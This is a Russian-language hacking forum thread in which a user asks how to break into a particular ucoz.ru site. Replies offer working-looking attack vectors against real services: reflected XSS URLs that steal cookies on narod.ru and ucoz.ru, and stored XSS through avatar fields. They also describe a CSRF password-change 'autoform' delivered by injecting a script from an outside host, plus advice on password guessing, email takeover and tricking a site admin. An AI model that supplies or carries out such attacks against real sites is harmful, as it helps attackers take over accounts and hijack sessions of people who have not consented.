![]() |
Взлом h1-h17.ru,narod.ru,ucoz.ru
Вобщем сабж.
Скажите какае есть уязвимости у этих сайтов. P.S:Хочу вломать сайт ***.ucoz.ru |
на народе =)
http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script> + там еще в гослевой xss была |
пасибо.
А на юкосе? |
А на Ucoz'e, насколько я знаю, ничего интересного сейчас нет
|
Hot - с полгода назад там в гостевой, в тексте,
хсс была ща не знаю |
сейчас там можно восстановить пароль любого пользователя, но не админа и модера
|
Ucoz
1) многочисленные перменные профайла в GET 2) попытка реализовать автоформу обламалась, так как рефере проверяеться. Однако иожно использовать другой модуль. К примеру поднятия прав до администрирования у определённого пользователя - сделать на это автоформу...или там автоформа на что нить...ещё На самом деле автоформы и по сей день очень актуальны...даже там где есть защита, просто смотреть надо шире именно в open sources. 3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS). ..... уверен куча там ещё всего |
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
на укозе можно только юных простаков ломать, которые не могут нормальный пароль поставить и за 10 попыток их пароль подбирается.... или путем взлома почты и подбора секретного вопроса, но это может получиться если жертву знаешь, так как часто фамилию матери вводят или типа того.... __XT__, www.woweb.ru - взломай этот сайт, на укозе тоже кстати находится, раз такой великий хацкер. |
Цитата:
|
Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!
Код:
1. 4tex.info |
Jah, наркоман?) Эти домены просто прикручены - движок там юкоза)
|
3dn
Чё за ламос очередной=))) Если сказал, что уязвимость в профайле именно в GET значит так и есть. Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-)))) бггггггггг 3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS). "по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели..." Internet Explorer <=7.0 допотопные браузеры да? бггг посмеялся спасибо. читай ламос: http://kodsweb.ru/texts/ie_graphics_xss.txt и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект! |
Цитата:
Цитата:
Цитата:
|
Цитата:
p0.ru - а это вообще один из доменов укоза, также как и clan.su, my1.ru и т.д. смотрю тут из советчиков одни детки сидят, которые не способны даже на главную страницу укоза зайти и посмотреть на сайты в колонке слева и текст почитать, чтобы понять что такое укоз.... но советы по взлому давать горазды. вам только сайты на народе ломать и пхп нюку по уже известным дырам. HOT, хочешь взломать, разводи админа сайта на пароль хитростями.... совет по взлому самой системы ты тут на найдешь, не тот уровень здешних хацкеров, чтобы предложить что-то достойное, они даже с укозом не знакомы.... а как можно взломать то, в чем не разбираешься??? |
Цитата:
давай объективно: что ты хочешь, чтобы я нашёл активную XSS на юкозе? может как нить займусь, может найду а может и нет. "XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь" Извини парень давай без оскарблений но ты рельно не понимаешь вообще о чём я. Я не писал про добавления скриптов с помощью разрешённых html. Выше я писал про автоформы...ты в курсе, что это? если нет спроси у кого нить. Цитата:
Дырка это работает как простая пассивная XSS для браузеров IE. Проверенно на разных web приложениях. Лучше почитай тут, уже писал: http://forum.antichat.ru/threadedpost222134.html#post222134 "людям работающим с троянами жизнь малиной бы показалась" а это к чему? или ты опять меня не понял или ты вообще не в теме Цитата:
ты меня не знаешь и я тебя незнаю, приёму любую объективную критику, но не надо по киддисовски общаться я так не привык. я просто уверен в сырости юкоза. Если потестить оч. хорошо то найти можно много, наверняка. Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=) |
__XT__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями.
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так.... я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал.... |
Цитата:
Цитата:
Странно когда я знакомился с организатором хак-сцены Хаоса он мне такого не говорил...товарищ не держал марку великого хакера=-)))) (Аггр если увидишь не смеяться=) ) Цитата:
Цитата:
2)заявления старался писать объективно Цитата:
ты так уверен в моём ламеризме=? ну если тебе легче будет я ламос-) я просто прикалываюсь что я хакер любительского уровня=))) Цитата:
автоформы там реально сделать. Xss там хватает. пхп-инъекций я дум маю найти там не реально=_) Цитата:
ты уверен что Юкоз защищённый? А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=) Как говорил Декан кафедры Информационной Безопасноти Питерского ПОлитеха "Безопасность - это процесс..." ...лан парень ты вмето того, чтобы отписывать мне наборы слов, лучшеб показал мне чё нить интересное на юкозе какие нить уязвимости=))) |
перед сном глянул юкоз чуток...на пассивные уязвимости.
По поводу активной XSS: плохая фильтрация в профайле в поле ссылки на аватуру. Можно выполнить експлутировать скрипт javascript: анти-киддис-бгг vbscript: анти-киддис-бгг (кстати неплохая активка получилась... везде где светим аватар везде XSS) по поводу пассивных их там оч. много. Ну вот одна просто самая близкая, роли она практически не играет однако как пример, что XSS там есть сойдёт=) http://mirinet.narod.ru/ucoz_passiv.html По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера. Понял, что можно експлуатировать наиболее удачную пассивную XSS и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script> где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера. т.к. запрос будет от юкоза=) По поводу уязвимостей более серьёзных: было пару подозрений на sql-inj. всем приятных снов и пока! |
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Твой каждый пост только показывает всю твою малограмотность в веб-технологиях. Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет.... Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат. |
Цитата:
А кто сказал, что Ucoz CMS не кто не ломал? если ты не знаешь, то незначит, что его не ломали. Повторю, докажи, что данная CMS неуязвима и я докажу тебе, что она уязвима=))) Цитата:
Дальше не спрашивай, что к чему...т.к. активную XSS показал, кое кто поймёт как обхадить фильтрацию нужных символов а киддисам и знать не надо. Цитата:
Через автоформу Постом ударяем по пасивке=))) http://mirinet.narod.ru/ucoz_passiv.html Цитата:
просто дикая чушь. ты понимаешь вообще суть автоформ? даёшь жертве линк на страничку на которой постом отправляеться запрос на смену пароля или ещё чего нить. Ну дак вот посматри в форме профайла какие перменные? где ты там айди сессии увидел? Даже если сессию проверяют ...уязвимость не теряеться...т.к. жертва сама не зная того меняет у себя пароль (при условии что она авторизирована) вот меня пока блокирнуло то, что система проверяет реферер..при запуске автоформы сайт мне вернул: "You are trying to do illegal action!" Цитата:
Цитата:
=== Слушай меня терзают мутные сомнения=))) ты случаем не один из моих знакомых, который решил поприкалываться на домной? если так то ты реально меня достал...респект=) Если нет - Давай закроем нашу дисскусию, т.к. народу неинтересны наши тупые припинания, он и так сделал выводы...если хочешь я соглашусь что ты прав а я ламер=) стучи 243122140 пообщаемся |
пла сериал нах снять моно о_0
3dn ты случаем не сотрудник юсоса???о_0 ...иль для фрикол ником выпрал их томен?о_0 |
3dn либо реально один из их кодеров,который считает,что его система совершенна или лопух,котрый хочет узнать баги юкоза или параноик какой-то,но если честно ведёт себя не очень адекватно и даже агрессивно. Чувак,релакс =)
|
Цитата:
|
а с джином как?
|
кодер лопух который ищет баги чтоб их закрыть? о_0
ЗЫ.про юкоз кажись писали что не фильтрует знак @ о_0 |
А я знаю sql-инъекцию на укозе на главном сайте...
|
Цитата:
Цитата:
|
3dn вот xss на главном сайте 6
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E |
Цитата:
|
3dn цуко командир нашелся оффтопер нах
|
Цитата:
Цитата:
|
а меня ктонибудь слышал? как на счет джино и by.ru?
|
Цитата:
По поводу бай.ру, то там нельзя скрипты ставить, а значит ломать нечего, разве что весь сервер, но система старая и все дыры уже давно закрыли, да и если ты тут вопросы задаешь, то про взлом сервера тебе даже отдаленно думать не стоит. |
понятно.
Почему это не стоит?! |
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E - дыру по ходу дела уже залатали, там видно htmlspecialchar() поставили на эту переменную, поэтому тэги не вставитить...
|
Цитата:
|
| Время: 16:28 |